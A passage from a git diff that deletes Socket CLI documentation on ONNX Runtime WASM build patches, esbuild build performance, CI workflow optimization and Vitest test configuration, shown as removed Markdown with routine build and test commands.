- -### Error Without Patch -``` -error: 'class MLFloat16' has no member named 'Negate' -error: 'class MLFloat16' has no member named 'IsNegative' -error: 'class MLFloat16' has no member named 'FromBits' -``` - -### What It Does -Comments out the `BUILD_MLAS_NO_ONNXRUNTIME` definition: - -```cmake -# Before -add_compile_definitions( - BUILD_MLAS_NO_ONNXRUNTIME -) - -# After -# add_compile_definitions( -# BUILD_MLAS_NO_ONNXRUNTIME -# ) -``` - -### Is This Still Needed? -**Partially**. We now build with `--enable_wasm_threads`, which avoids this issue. However, the patch is kept for safety in case threading needs to be disabled in the future. - -### Reference -GitHub Issue: https://github.com/microsoft/onnxruntime/issues/23769 - -## Patch 3: wasm_post_build.js Compatibility - -**File**: `js/web/script/wasm_post_build.js` -**Location**: `scripts/build.mjs:137-158` - -### Problem -ONNX Runtime's post-build script expects a specific Worker URL pattern from older Emscripten versions. Modern Emscripten (3.1.50+) doesn't generate this pattern, causing the build to fail. - -### Error Without Patch -``` -Error: Unexpected number of matches for "" in "": . - at wasm_post_build.js:12:13 -``` - -### What The Script Does -The `wasm_post_build.js` script tries to transform Worker instantiation code: - -```javascript -// Emscripten generates (old versions): -new Worker(new URL("./ort-wasm-simd-threaded.worker.mjs", import.meta.url), {...}) - -// ONNX wants (bundling optimization): -new Worker(new URL(import.meta.url), {...}) -``` - -This makes the worker use the same file instead of loading a separate worker file. - -### Why Modern Emscripten Fails -Modern Emscripten either: -1. Generates the correct format already (no transformation needed) -2. Uses a different Worker pattern (but still functionally correct) -3. 
Handles threading differently (but correctly) - -### What Our Patch Does -Gracefully skips the transformation when the old pattern isn't found: - -```javascript -// Before (ONNX Runtime's code): -if (matches.length !== 1) { - throw new Error(`Unexpected number of matches...`); -} - -// After (our patch): -if (matches.length === 0) { - console.log('No Worker URL pattern found - skipping post-build transformation (modern Emscripten)'); - return; // Exit gracefully -} -if (matches.length !== 1) { - throw new Error(`Unexpected number of Worker URL matches: found ${matches.length}, expected 1. Pattern: ${regex}`); -} -``` - -### Is Skipping It Safe? -**Yes, absolutely**: - -1. **The WASM already compiled** - This is just post-processing of the .mjs glue code -2. **Modern Emscripten generates correct code** - The Worker will work without transformation -3. **It's a legacy optimization** - Written for older Emscripten versions -4. **No runtime impact** - If the Worker doesn't work, you'd see errors at runtime (which we don't) - -### What This Patch Also Fixes -The error message was broken (empty strings). We fix it to show actual values: - -```javascript -// Before: Useless error message -throw new Error(`Unexpected number of matches for "" in "": .`); - -// After: Helpful error message -throw new Error(`Unexpected number of Worker URL matches: found ${matches.length}, expected 1. Pattern: ${regex}`); -``` - -## Summary - -| Patch | Type | Reason | Risk | Can Remove? | -|-------|------|--------|------|-------------| -| Eigen Hash | Dependency | GitLab format change | None | No (upstream issue) | -| BUILD_MLAS_NO_ONNXRUNTIME | Build Fix | MLFloat16 missing methods | Low | Yes (if always use threading) | -| wasm_post_build.js | Compatibility | Modern Emscripten support | None | No (modern toolchain) | - -## Maintenance Notes - -### When to Update These Patches - -1. **Eigen Hash**: Update if ONNX Runtime updates Eigen version in `deps.txt` -2. 
**BUILD_MLAS_NO_ONNXRUNTIME**: Can likely be removed once threading is confirmed stable -3. **wasm_post_build.js**: Keep indefinitely - harmless and ensures forward compatibility - -### How to Test Without Patches - -To verify if a patch is still needed: - -```bash -# Comment out the patch in scripts/build.mjs -# Then run: -node scripts/build.mjs --clean - -# If build succeeds without it, the patch may no longer be needed -# If build fails, the patch is still required -``` - -### Upstream Status - -- **Eigen Hash**: Reported but upstream unlikely to fix (GitLab issue, not ONNX issue) -- **BUILD_MLAS_NO_ONNXRUNTIME**: Fixed in newer versions with threading enabled -- **wasm_post_build.js**: Not reported (would need to add Emscripten version detection) - -## References - -- ONNX Runtime Build System: https://onnxruntime.ai/docs/build/web.html -- Emscripten Threading: https://emscripten.org/docs/porting/pthreads.html -- MLFloat16 Issue: https://github.com/microsoft/onnxruntime/issues/23769 diff --git a/docs/performance/performance-build.md b/docs/performance/performance-build.md deleted file mode 100644 index 47db6dcce..000000000 --- a/docs/performance/performance-build.md +++ /dev/null @@ -1,453 +0,0 @@ -# Build Performance Optimization - -## Overview - -Socket CLI uses esbuild for fast, reliable builds with optimal CLI startup performance. This document covers the build system architecture, optimizations, and available flags. 
- -## Why esbuild over Rollup - -### Single-pass compilation -- **Build time**: ~500ms typical (vs minutes with Rollup) -- **Hot reload**: Near-instant rebuilds in watch mode -- **Development velocity**: Faster iteration cycles - -### No template literal corruption -- esbuild preserves template literals correctly -- Rollup had historical issues with string interpolation -- Critical for CLI output formatting - -### Better for CLI startup time -- Optimized CommonJS output -- Minimal overhead in generated code -- Fast module initialization - -### Post-build Brotli compression -- Automatic `.bz` compressed artifacts -- Quality level 11 (maximum compression) -- Typical 70-80% size reduction -- Example: 11MB → 2.5MB compressed - -## Build Architecture - -``` -Entry point: src/cli-dispatch.mts - ↓ -esbuild bundler - ↓ -Optimizations: - ├─ Tree shaking (unused code removal) - ├─ Minification (optional, via --no-minify flag) - ├─ Local package resolution (monorepo support) - └─ Plugin system (custom resolvers) - ↓ -Output: dist/cli.js (executable CommonJS) - ↓ -Brotli compression - ↓ -Output: dist/cli.js.bz (compressed artifact) -``` - -## Build Optimizations - -### Minification -```javascript -// Default: minify disabled for readable stack traces -minify: false - -// Override for production builds: -SOCKET_CLI_NO_MINIFY=0 node scripts/build.mjs -``` - -### Tree-shaking -- Enabled by default -- Removes unused exports and code paths -- Significant bundle size reduction - -### Local package resolution -Resolves Socket monorepo packages during build: -- `@socketsecurity/lib` → Local `socket-lib` dist -- `@socketsecurity/sdk` → Local `socket-sdk-js` dist -- `@socketsecurity/registry` → Local `socket-registry/registry` dist -- `@socketregistry/packageurl-js` → Local `socket-packageurl-js` dist - -Benefits: -- No need to publish packages during development -- Instant reflection of local changes -- Consistent versioning across repos - -### Build analysis -```javascript -// esbuild 
config includes metafile generation -metafile: true - -// Outputs bundle size during build: -// ✓ Bundle size: 10.45 MB -``` - -## Build Flags - -### `--watch` -Development mode with automatic rebuilds: -```bash -pnpm run build:watch -# or -pnpm run dev -``` - -Features: -- Watches source files for changes -- Rebuilds on modification -- Near-instant incremental builds -- Preserves terminal output - -### `--no-minify` -Disable minification for debugging: -```bash -node scripts/build.mjs --no-minify -``` - -Use when: -- Debugging production issues -- Analyzing bundle contents -- Improving stack traces - -### `--quiet` -Suppress build progress output: -```bash -node scripts/build.mjs --quiet -``` - -### `--verbose` -Show detailed build information: -```bash -node scripts/build.mjs --verbose -``` - -### `--sea` -Build Single Executable Application binaries: -```bash -node scripts/build.mjs --sea -``` - -Delegates to `scripts/build-sea.mjs` for platform-specific executables. - -## Performance Characteristics - -### Build times - -``` -Cold build (clean): ~2-3 seconds - ├─ Clean dist: < 100ms - ├─ Extract WASM/models: ~1-2 seconds - └─ esbuild bundle: ~500ms - -Hot rebuild (watch mode): ~200-500ms - └─ esbuild incremental: ~200-500ms - -Full rebuild (with SEA): ~5-10 minutes - ├─ CLI build: ~2-3 seconds - └─ Platform binaries: ~5-10 minutes -``` - -### Bundle size - -``` -Uncompressed: ~11 MB - └─ Large due to bundled dependencies: - - ONNX runtime (~3MB) - - ML models (~2MB) - - Ink/React (~1MB) - - CLI dependencies (~5MB) - -Compressed (brotli): ~2.5 MB (77% reduction) - └─ Quality 11 (maximum) - └─ Used for distribution artifacts -``` - -### Startup time implications - -``` -Cold start: ~150-250ms - ├─ Node.js init: ~50ms - ├─ Module loading: ~50-100ms - └─ CLI init: ~50-100ms - -Warm start (cached): ~80-120ms - └─ Filesystem cache hit reduces module loading -``` - -Optimization impact: -- esbuild produces smaller output than Rollup -- CommonJS format loads faster 
than ESM in Node.js -- Single-file bundle reduces filesystem operations -- Tree-shaking removes ~30% unused code - -## Build Pipeline - -### Standard build -```bash -pnpm run build - -Steps: -1. Clean dist directory -2. Extract MiniLM model (ML inference) -3. Extract ONNX runtime (ML execution) -4. Extract Yoga WASM (layout engine) -5. Run esbuild bundle -6. Compress with brotli -``` - -### Watch mode -```bash -pnpm run build:watch - -Steps: -1-4. (same as standard build) -5. Run esbuild in watch mode - └─ Skips brotli compression - └─ Incremental rebuilds only -``` - -### Production build -```bash -INLINED_SOCKET_CLI_PUBLISHED_BUILD=1 pnpm run build - -Additional: -- Sets production environment flags -- Includes version hash -- Optimizes for distribution -``` - -## Build Artifacts - -``` -dist/ -├─ cli.js Primary executable (11MB) -├─ cli.js.bz Brotli compressed (2.5MB) -├─ npm-cli.js npm wrapper -├─ npx-cli.js npx wrapper -├─ pnpm-cli.js pnpm wrapper -└─ yarn-cli.js yarn wrapper -``` - -## Monorepo Integration - -### Package resolution order -``` -1. Local sibling directories: - ../../../socket-lib - ../../../socket-sdk-js - ../../../socket-registry/registry - ../../../socket-packageurl-js - -2. node_modules fallback: - node_modules/@socketsecurity/lib - node_modules/@socketsecurity/sdk - (etc.) - -3. 
Fail with clear error -``` - -### Custom plugins - -**resolve-socket-packages**: -- Resolves local Socket packages by path -- Handles subpath exports (e.g., `@socketsecurity/lib/logger`) -- Checks `package.json` exports field - -**resolve-socket-lib-internals**: -- Handles relative imports within socket-lib -- Maps `../constants/*` to dist paths -- Resolves bundled external dependencies - -**yoga-wasm-alias**: -- Redirects `yoga-layout` to custom sync implementation -- Required for Ink rendering in CLI - -**stub-problematic-packages**: -- Stubs `iconv-lite` and `encoding` -- Prevents bundling issues with optional dependencies - -## Troubleshooting - -### Build fails with "Cannot find module" - -Check local package paths: -```bash -ls -la ../../../socket-lib/dist -ls -la ../../../socket-sdk-js/dist -ls -la ../../../socket-registry/registry/dist -``` - -Rebuild dependencies: -```bash -cd ../../../socket-lib && pnpm run build -cd ../../../socket-sdk-js && pnpm run build -``` - -### Build succeeds but runtime errors - -Missing WASM/models: -```bash -# Re-extract assets -node packages/cli/scripts/extract-yoga-wasm.mjs -node packages/cli/scripts/extract-onnx-runtime.mjs -node packages/cli/scripts/extract-minilm-model.mjs -``` - -### Slow build times - -Use watch mode for development: -```bash -pnpm run dev -``` - -Clean node_modules if very slow: -```bash -pnpm run clean:node_modules -pnpm install -``` - -### Bundle size too large - -Check what's included: -```bash -# Build with analysis -node packages/cli/.config/esbuild.cli.build.mjs - -# Review metafile output -# Check for unexpected dependencies -``` - -## Best Practices - -### Development workflow -```bash -# 1. Start watch mode -pnpm run dev - -# 2. Make code changes -# 3. Test immediately (auto-rebuilt) -pnpm exec socket --version - -# 4. Iterate quickly -``` - -### Production workflow -```bash -# 1. Clean build -pnpm run build - -# 2. Run tests -pnpm test - -# 3. 
Verify bundle -ls -lh packages/cli/dist/cli.js - -# 4. Check startup time -time pnpm exec socket --version -``` - -### CI/CD workflow -```bash -# Build once, use everywhere -pnpm run build --quiet - -# Test with built artifacts -pnpm test-ci - -# Package for distribution -pnpm run build:platforms -``` - -## Comparison: esbuild vs Rollup - -| Feature | esbuild | Rollup | -|---------|---------|--------| -| Build time | ~500ms | ~30-60s | -| Watch mode | ~200ms | ~5-10s | -| Template literals | ✓ Correct | ⚠ Corruption issues | -| Tree shaking | ✓ Fast | ✓ Thorough | -| Minification | ✓ Built-in | Requires plugin | -| Plugin ecosystem | Growing | Mature | -| CLI startup impact | Fast | Slower | - -## Future Optimizations - -### Potential improvements -1. **Code splitting**: Split large dependencies into chunks -2. **Lazy loading**: Load ML models on demand -3. **Native modules**: Replace JS with native addons where beneficial -4. **Bundle analysis**: Automated size regression detection - -### Monitoring -```bash -# Track bundle size over time -du -h packages/cli/dist/cli.js - -# Compare startup time -hyperfine 'pnpm exec socket --version' - -# Profile cold starts -node --prof packages/cli/dist/cli.js --version -``` - -## Node.js Binary Optimizations - -Socket CLI also optimizes the underlying Node.js binary used for standalone distributions: - -### Binary Size Reduction -``` -Standard Node.js: 102MB (with debug symbols) -Optimized Binary: 35MB (66% smaller) - -Optimizations applied: -├─ V8 Lite Mode: -23MB (removes JIT tiers) -├─ ICU Removal: -8MB (no i18n support needed) -├─ SEA Removal: -2MB (we use yao-pkg instead) -└─ GNU Strip: -3MB (aggressive symbol removal) -``` - -### Build Performance -``` -Build System: Ninja (17% faster than Make) -Clean Build: 15-18 minutes -Incremental: 2-4 minutes - -Future optimizations: -├─ Parallel Brotli: 50-70% faster compression -├─ Compression cache: 80-90% faster rebuilds -└─ Resume checkpoint: Avoid full rebuilds on failure 
-``` - -### Runtime Performance -``` -Startup Time: No degradation (actually 8% faster) -JS Execution: 10-20% slower (acceptable for CLI) -WASM: No degradation (Liftoff intact) -I/O Operations: No degradation - -Real-world impact: <5% slower on CLI commands -Reason: CLI is I/O bound, not CPU bound -``` - -**See [../node-smol-builder/optimizations.md](../node-smol-builder/optimizations.md) for complete details.** - ---- - -## Summary - -Socket CLI's build system optimizes at two levels: - -**1. CLI Bundle (esbuild)** -- Sub-second builds for rapid development -- Tree-shaking and minification -- Brotli compression (77% size reduction) -- Fast startup times - -**2. Node.js Binary (smol-builder)** -- 66% smaller binaries (35MB vs 102MB) -- 17% faster builds with Ninja -- Negligible runtime impact for CLI workloads - -The combination delivers both fast development cycles and compact, performant distribution artifacts. diff --git a/docs/performance/performance-ci.md b/docs/performance/performance-ci.md deleted file mode 100644 index afee50af8..000000000 --- a/docs/performance/performance-ci.md +++ /dev/null @@ -1,406 +0,0 @@ -# CI/CD Performance Optimization - -Comprehensive guide to socket-cli's CI/CD pipeline optimization strategy and performance characteristics. 
- -## Workflow Architecture - -``` -CI Trigger (PR/Push) - │ - ├─ socket-cli/.github/workflows/ci.yml - │ └─ calls socket-registry/.github/workflows/ci.yml@ - │ │ - │ ├─ 🧹 Lint Check (parallel) - │ ├─ 🔍 Type Check (parallel) - │ └─ 🧪 Test Matrix (parallel) - │ ├─ Node 20 x Ubuntu - │ ├─ Node 20 x macOS - │ ├─ Node 20 x Windows - │ ├─ Node 22 x Ubuntu - │ ├─ Node 22 x macOS - │ ├─ Node 22 x Windows - │ ├─ Node 24 x Ubuntu - │ ├─ Node 24 x macOS - │ └─ Node 24 x Windows -``` - -## Reusable Workflow Strategy - -Socket-cli uses a centralized reusable workflow from socket-registry: - -```yaml -uses: SocketDev/socket-registry/.github/workflows/ci.yml@020ed8b2ef62abb750b083d7859ee3a221f88cf7 # main -``` - -**Benefits**: -- Single source of truth for CI configuration across Socket projects -- Centralized updates to CI logic benefit all projects -- Consistent behavior and optimization patterns -- Reduced maintenance burden per project - -**Pinned SHA Requirements**: -- GitHub Actions security best practice -- Ensures reproducible builds -- Prevents supply chain attacks via tag manipulation -- Update using: `cd socket-registry && git rev-parse main` - -## Matrix Testing Configuration - -```yaml -node-versions: '[20, 22, 24]' -os-versions: '["ubuntu-latest", "macos-latest", "windows-latest"]' -fail-fast: false -max-parallel: 4 -``` - -**Design Decisions**: -- `fail-fast: false` - All platform combinations must pass; no early exit -- Cross-platform testing ensures Windows + Unix compatibility -- Multiple Node versions validate compatibility range (18+) -- `max-parallel: 4` - Balance between speed and resource usage - -## CI-Specific Optimizations - -### 1. Early Bailout on Failures - -```javascript -// vitest.config.mts -bail: process.env.CI ? 1 : 0 -``` - -**Effect**: Exit immediately on first test failure in CI -**Benefit**: Faster feedback loop, saves compute time -**Local behavior**: Runs all tests for comprehensive debugging - -### 2. 
CI-Specific Scripts - -```json -{ - "lint-ci": "pnpm run lint", - "test-ci": "run-s test:*", - "type-ci": "pnpm run type" -} -``` - -**Why separate scripts**: -- No watch mode in CI (`--watch` flags removed) -- No interactive prompts or user input -- Consistent exit codes for CI integration -- Clear separation between dev and CI workflows -- Easy to add CI-specific flags (`--ci`, `--no-color`, etc.) - -**Standard pattern**: -``` -Development: pnpm run lint # May include --fix, --watch -CI: pnpm run lint-ci # Strict mode, no modifications -``` - -### 3. Test Parallelization - -```javascript -// vitest.config.mts -pool: 'threads', -poolOptions: { - threads: { - singleThread: false, - maxThreads: isCoverageEnabled ? 1 : 16, - minThreads: isCoverageEnabled ? 1 : 4, - isolate: false, - useAtomics: true - } -}, -sequence: { - concurrent: true -} -``` - -**Performance characteristics**: -- Multi-threaded execution (up to 16 threads) -- Worker isolation disabled for speed (`isolate: false`) -- Concurrent test execution within suites -- Atomic operations for thread synchronization - -**Trade-offs**: -- Speed over full isolation -- Requires proper test cleanup (beforeEach/afterEach) -- Mocking frameworks (nock, vi.mock) work correctly - -### 4. Build Caching Strategy - -```yaml -test-setup-script: 'cd packages/cli && pnpm run build' -``` - -**Caching layers**: -1. pnpm store cache (dependencies) -2. Node modules cache -3. Build artifacts (dist/) - -**Handled by setup-and-install action**: -- Automatic dependency caching by pnpm/action-setup -- Cache key based on pnpm-lock.yaml hash -- Separate caches per OS/Node version combination - -### 5. 
Dependency Installation - -```yaml -# Managed by SocketDev/socket-registry/.github/actions/setup-and-install -``` - -**Optimizations**: -- Frozen lockfile (`pnpm install --frozen-lockfile`) -- Shared pnpm store across workflow runs -- Parallel dependency fetching -- No postinstall scripts unless explicitly needed - -## Performance Metrics - -**Typical CI run times** (per platform): - -``` -Job Duration Notes -───────────────────────────────────────────────────── -Lint Check 1-2 min Biome + ESLint -Type Check 1-2 min TypeScript compilation -Test (Ubuntu) 3-5 min Fastest platform -Test (macOS) 4-6 min Medium performance -Test (Windows) 5-8 min Slowest platform -───────────────────────────────────────────────────── -Total (parallel) 5-8 min All checks running -Total (sequential) 20-30 min If run serially -``` - -**Time saved with optimizations**: -- Parallel execution: ~15-20 min saved vs sequential -- Build caching: ~1-2 min saved per job -- Early bailout: ~2-4 min saved on test failures -- Dependency caching: ~30-60 sec saved per job - -**Total optimization impact**: ~18-26 min saved per CI run - -## When CI Runs - -```yaml -on: - push: - branches: [main] - tags: ['*'] - paths: - - 'packages/cli/**' - - 'pnpm-lock.yaml' - - 'package.json' - - '.github/workflows/ci.yml' - pull_request: - branches: [main] - paths: - - 'packages/cli/**' - - 'pnpm-lock.yaml' - - 'package.json' - - '.github/workflows/ci.yml' - workflow_dispatch: -``` - -**Trigger conditions**: -- Pull requests to main branch -- Pushes to main branch -- Tag creation (releases) -- Manual dispatch (workflow_dispatch) -- Only when relevant files change (path filtering) - -**Path filtering benefits**: -- Skip CI for docs-only changes -- Reduce unnecessary builds -- Faster feedback on non-code changes - -## Debugging CI Failures - -### Reproduce Locally - -```bash -# Set CI environment -export CI=1 - -# Run exact CI commands -cd packages/cli -pnpm run build -pnpm run check -pnpm run type -pnpm run test:unit 
-``` - -**Environment differences to consider**: -```bash -CI=1 # Enables CI-specific behavior -NODE_ENV=test # May affect config loading -NO_COLOR=1 # Disables terminal colors -TERM=dumb # Non-interactive terminal -``` - -### Common Issues - -**Issue**: Tests pass locally, fail in CI -``` -Causes: - - Missing build step (pretest hook skipped in CI) - - Environment variable differences - - File path case sensitivity (macOS vs Linux) - - Timing issues with concurrent tests - -Solution: - 1. Run pnpm run build explicitly - 2. Check .env.test vs .env.local - 3. Use path.join() for cross-platform paths - 4. Add await or increase timeouts -``` - -**Issue**: Windows tests fail, Unix passes -``` -Causes: - - Hard-coded forward slashes in paths - - Line ending differences (CRLF vs LF) - - Case-sensitive imports - - Shell script incompatibilities - -Solution: - 1. Use path.join(), path.resolve() - 2. Configure Git: core.autocrlf=input - 3. Match exact casing in imports - 4. Use Node.js APIs instead of shell commands -``` - -**Issue**: Flaky test failures -``` -Causes: - - Race conditions in concurrent tests - - Shared state between tests - - External service dependencies - - Filesystem timing issues - -Solution: - 1. Add proper cleanup in afterEach - 2. Use unique temp directories per test - 3. Mock external dependencies (nock) - 4. 
Add fs.promises with await -``` - -### CI-Specific Debugging - -**Enable debug output**: -```yaml -workflow_dispatch: - inputs: - debug: '1' -``` - -**Check specific Node/OS combination**: -```yaml -workflow_dispatch: - inputs: - node-versions: '[22]' - os-versions: '["ubuntu-latest"]' -``` - -**Skip tests temporarily**: -```yaml -workflow_dispatch: - inputs: - skip-tests: true -``` - -### Environment Differences - -``` -Local Development CI Environment -────────────────────────────────────────────────── -Interactive terminal Non-interactive (TERM=dumb) -Color output enabled Colors disabled (NO_COLOR=1) -Watch mode available No watch mode -Build cache persistent Fresh build each run -Node modules cached Clean install -Git hooks active No Git hooks -.env.local loaded .env.test loaded -User-specific config No user config -``` - -## Optimization Best Practices - -### Test Organization - -```javascript -// Good - Fast tests -describe('validation', () => { - it('should validate input', () => { - expect(validate('test')).toBe(true) - }) -}) - -// Avoid - Slow tests -describe('validation', { timeout: 60_000 }, () => { - it('should validate with network call', async () => { - const result = await fetchAndValidate('test') - expect(result).toBe(true) - }) -}) -``` - -**Guidelines**: -- Unit tests should be fast (<100ms each) -- Mock external dependencies (filesystem, network, APIs) -- Use fixtures instead of generating data -- Avoid unnecessary async operations -- Group slow tests separately (e2e, integration) - -### Script Composition - -```json -{ - "test": "run-s check test:*", - "test:prepare": "pnpm build && del-cli 'test/**/node_modules'", - "test:unit": "vitest run", - "test:validate": "node scripts/validate-tests.mjs", - "test:wrapper": "node scripts/test-wrapper.mjs", - "test-ci": "run-s test:*" -} -``` - -**Pattern**: Break into atomic steps -- Each step can run independently -- Easy to debug individual failures -- Clear progress tracking -- Parallel execution 
possible (run-p vs run-s) - -### Caching Strategy - -**What to cache**: -- pnpm store (automatic via pnpm/action-setup) -- node_modules (automatic) -- Build artifacts (dist/) -- Type coverage results - -**What NOT to cache**: -- Test results (must run fresh) -- Temporary files -- Log output -- Coverage reports - -## Future Optimizations - -**Potential improvements**: -- Sharded test execution (split tests across jobs) -- Incremental type checking (only changed files) -- Build output caching between jobs -- Dynamic matrix based on changed files -- Turborepo for monorepo task caching - -**Blocked by**: -- Vitest sharding support maturity -- TypeScript incremental build complexity -- GitHub Actions artifact size limits -- Matrix job coordination overhead - -## Related Documentation - -- Build system: `/Users/jdalton/projects/socket-cli/docs/build-system-summary.md` -- Local testing: `/Users/jdalton/projects/socket-cli/docs/local-testing.md` -- Configuration: `/Users/jdalton/projects/socket-cli/docs/configuration-summary.md` -- Socket registry standards: `/Users/jdalton/projects/socket-registry/CLAUDE.md` diff --git a/docs/performance/performance-testing.md b/docs/performance/performance-testing.md deleted file mode 100644 index 6f5360eb1..000000000 --- a/docs/performance/performance-testing.md +++ /dev/null @@ -1,536 +0,0 @@ -# Performance Testing - -Comprehensive guide to socket-cli's test optimization strategies, including configuration, smart test selection, and memory management. - -## Vitest Configuration - -### Thread Pool - -```typescript -pool: 'threads', -poolOptions: { - threads: { - maxThreads: isCoverageEnabled ? 1 : 16, - minThreads: isCoverageEnabled ? 
1 : 4, - isolate: false, - useAtomics: true, - } -} -``` - -**Thread allocation**: -- **Development**: 4-16 threads for fast parallel execution -- **Coverage mode**: Single thread for accurate V8 coverage collection -- **Worker threads**: Leverage multi-core CPUs effectively - -### `isolate: false` Tradeoff - -**Decision matrix**: -``` -isolate: true → Full isolation, slower, breaks nock/module mocking -isolate: false → Shared worker context, faster, mocking works -``` - -**Why `isolate: false`**: -1. Significant performance improvement (faster test runs) -2. Nock HTTP mocking works correctly across all test files -3. Vi.mock() module mocking functions properly -4. Test state pollution prevented through proper beforeEach/afterEach -5. Tests designed to clean up after themselves - -**Tests requiring isolation**: -- Use `{ pool: 'forks' }` in test file metadata -- Or use separate isolated config - -### Timeouts - -```typescript -testTimeout: 30_000 // 30 seconds -hookTimeout: 30_000 // 30 seconds -``` - -**Why 30 seconds**: -- CLI integration tests spawn processes -- Package manager operations (npm, pnpm, yarn) -- Network requests to Socket API -- SBOM generation with CDXgen -- File system operations in monorepo fixtures - -**Timeout flow**: -``` -Test starts → CLI spawns → Package manager runs → API calls → Assertions - (instant) (1-5s) (5-15s) (2-8s) (instant) - └─────────────── 30s maximum ─────────────────┘ -``` - -### Coverage Configuration - -```typescript -coverage: { - provider: 'v8', - reporter: ['text', 'json', 'html', 'lcov', 'clover'], - include: ['src/**/*.mts', 'src/**/*.ts'], - exclude: [ - '**/*.config.*', - '**/node_modules/**', - 'scripts/**', - 'test/**', - 'dist/**', - ], - all: true, -} -``` - -**Coverage modes**: -- **V8 provider**: Fast native coverage -- **Single thread**: Prevents race conditions -- **All files**: Reports uncovered code - -## Smart Test Selection - -### changed-test-mapper - -Maps source file changes to affected test files: - 
-```javascript -// Core files trigger full suite -CORE_FILES = [ - 'src/helpers.ts', - 'src/strings.ts', - 'src/constants.ts', - 'src/lang.ts', - 'src/error.ts', - 'src/validate.ts', -] - -// Specific mappings -src/package-url.ts → test/package-url.test.mts, test/integration.test.mts -src/result.ts → test/result.test.mts -test/*.test.mts → itself -``` - -**Decision tree**: -``` -File changed? - ├─ Core file → Run all tests - ├─ Config file → Run all tests - ├─ Test file → Run that test - ├─ Source file → Run mapped tests - └─ Data file → Run integration tests -``` - -### Using `--staged` Flag - -Run tests only for staged git changes: - -```bash -# Lint and test staged files -pnpm check --staged -pnpm lint --staged --fix - -# Stage specific changes, test them -git add src/package-url.ts -pnpm check --staged -``` - -**Flow**: -``` -git add file.ts → --staged flag → getStagedFiles() → map to tests → run subset -``` - -### Using `--changed` Flag - -Run tests for all uncommitted changes (default behavior): - -```bash -# Lint and test changed files -pnpm check -pnpm check --changed # explicit - -# Fix changed files -pnpm fix -``` - -**Flow**: -``` -Edit files → --changed flag → getChangedFiles() → map to tests → run subset -``` - -### Core Files Trigger Full Suite - -When changed, these files affect entire codebase: - -```javascript -CORE_FILES = [ - 'src/constants.ts', // Global constants - 'src/error.ts', // Error handling - 'src/helpers.ts', // Utility functions - 'src/lang.ts', // Language utilities - 'src/objects.ts', // Object utilities - 'src/strings.ts', // String utilities - 'src/validate.ts', // Validation logic -] - -CONFIG_PATTERNS = [ - '.config/**', // Build/lint configs - 'scripts/utils/**', // Script utilities - 'tsconfig*.json', // TypeScript config - 'eslint.config.*', // ESLint config -] -``` - -**Example**: -```bash -# Edit core file -vi src/helpers.ts - -# Triggers full suite -pnpm check -# ℹ Running all tests (core file changes) -``` - -## Test 
Execution Strategies - -### Development Workflow - -**Fast iteration**: -```bash -# Stage changes, run affected tests -git add src/package-url.ts -pnpm check --staged - -# Fix issues in staged files -pnpm lint --staged --fix -git add . - -# Run full check before commit -pnpm check -``` - -**Decision matrix**: -``` -Quick fix? - ├─ Yes → pnpm check --staged (fast, targeted) - └─ No → pnpm check (thorough, all affected) - -Before commit? - └─ Always → pnpm check (no flags, full safety) -``` - -### CI Execution - -**Always runs full suite**: -```javascript -if (process.env.CI === 'true') { - return { tests: 'all', reason: 'CI environment' } -} -``` - -**CI flow**: -``` -PR opened → CI detects → Runs all tests → Reports coverage → Status check -``` - -### Concurrent Execution - -```typescript -sequence: { - concurrent: true // Run tests concurrently within suites -} -``` - -**Parallelization**: -``` -Suite A: test1, test2, test3 → Thread pool -Suite B: test4, test5 → Thread pool } Parallel -Suite C: test6, test7, test8 → Thread pool -``` - -**Benefits**: -- Better thread utilization -- Faster suite completion -- Efficient multi-core usage - -### Early Bailout - -```typescript -bail: process.env.CI ? 1 : 0 -``` - -**Bailout strategy**: -``` -CI environment: - test1 ✓ → test2 ✓ → test3 ✗ → STOP (fast feedback) - -Local development: - test1 ✓ → test2 ✗ → test3 ✗ → Complete (see all failures) -``` - -## Memory Management - -### Memory Limits - -```javascript -NODE_OPTIONS: - `--max-old-space-size=${process.env.CI ? 
8192 : 4096} --max-semi-space-size=512` -``` - -**Memory allocation**: -``` -Local: 4GB old space + 512MB semi space = ~4.5GB total -CI: 8GB old space + 512MB semi space = ~8.5GB total -``` - -**Why these limits**: -- CLI spawns subprocesses (npm, pnpm, yarn) -- RegExp-heavy tests (parsing, validation) -- SBOM generation loads large dependency trees -- Concurrent test execution multiplies memory - -### Memory Flow - -``` -Test suite starts - ├─ Vitest allocates workers (16 threads max) - ├─ Each test spawns CLI process - │ ├─ CLI spawns package manager - │ ├─ Package manager loads dependency graph - │ └─ CLI processes results - ├─ V8 GC runs (semi-space helps with short-lived objects) - └─ Workers cleaned up -``` - -### Worker Error Filtering - -```javascript -// Filter out worker termination noise -if (result.stderr) { - const filtered = result.stderr - .split('\n') - .filter(line => !line.includes('Worker unexpectedly exited')) - .join('\n') -} -``` - -**Why filter**: -- Worker pool terminates normally after tests -- "Unexpectedly exited" is expected behavior -- Reduces noise in test output -- Focuses on actual errors - -### Semi-Space Sizing - -``` ---max-semi-space-size=512 -``` - -**Purpose**: -- Young generation GC optimization -- Better performance for short-lived objects -- CLI tests create many temporary objects: - - Parsed command arguments - - Spawned process metadata - - RegExp match results - - Temporary file paths - -**GC flow**: -``` -Object created → Semi-space → Survives? 
→ Old space - (512MB) No → GC collects (fast) - Yes → Promoted (kept) -``` - -## Isolated Tests - -### When to Use Isolated Config - -Use fork pool when tests: -- Mutate global state unsafely -- Require true process isolation -- Cannot share worker context -- Need independent module cache - -**Example scenarios**: -```javascript -// Needs isolation: mutates process.env extensively -describe('environment tests', { pool: 'forks' }, () => { - it('modifies NODE_ENV', () => { - process.env.NODE_ENV = 'production' - // Test logic - }) -}) - -// Does NOT need isolation: clean beforeEach/afterEach -describe('CLI tests', () => { - beforeEach(() => { - mockFs() - }) - afterEach(() => { - restoreFs() - }) -}) -``` - -### Fork Pool vs Thread Pool - -**Performance tradeoff**: -``` -Thread Pool (default): - ├─ Shared memory space - ├─ Fast worker creation - ├─ Efficient for most tests - └─ 10-30s typical suite time - -Fork Pool (isolated): - ├─ Separate process per worker - ├─ Slower worker creation - ├─ True isolation guarantee - └─ 2-5x slower than threads -``` - -**Configuration comparison**: -```typescript -// Standard config (fast) -pool: 'threads', -poolOptions: { - threads: { - isolate: false, - maxThreads: 16, - } -} - -// Isolated config (safe) -pool: 'forks', -poolOptions: { - forks: { - singleFork: true, - isolate: true, - } -} -``` - -### Migration Strategy - -``` -Evaluate test: - ├─ Modifies globals? → Use { pool: 'forks' } metadata - ├─ Cleans up properly? → Keep in thread pool - └─ Unsure? 
